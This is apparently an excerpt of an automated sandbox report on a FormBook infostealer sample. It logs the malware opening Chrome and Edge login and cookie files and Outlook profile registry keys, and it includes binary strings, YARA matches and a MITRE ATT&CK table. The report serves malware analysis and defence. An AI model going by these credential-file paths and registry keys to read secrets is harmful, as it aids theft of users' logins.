Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\systray.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: ZmK1CAc4VP.exe	Binary or memory string: WIN_XP
Source: ZmK1CAc4VP.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: ZmK1CAc4VP.exe	Binary or memory string: WIN_XPe
Source: ZmK1CAc4VP.exe	Binary or memory string: WIN_VISTA
Source: ZmK1CAc4VP.exe	Binary or memory string: WIN_7
Source: ZmK1CAc4VP.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1686918719.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4009083957.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4010478338.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687746502.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1688926331.00000000063F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4013593379.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4008861086.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4010273460.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_004652BE
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00476619
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0046CEF3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZmK1CAc4VP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
ZmK1CAc4VP.exe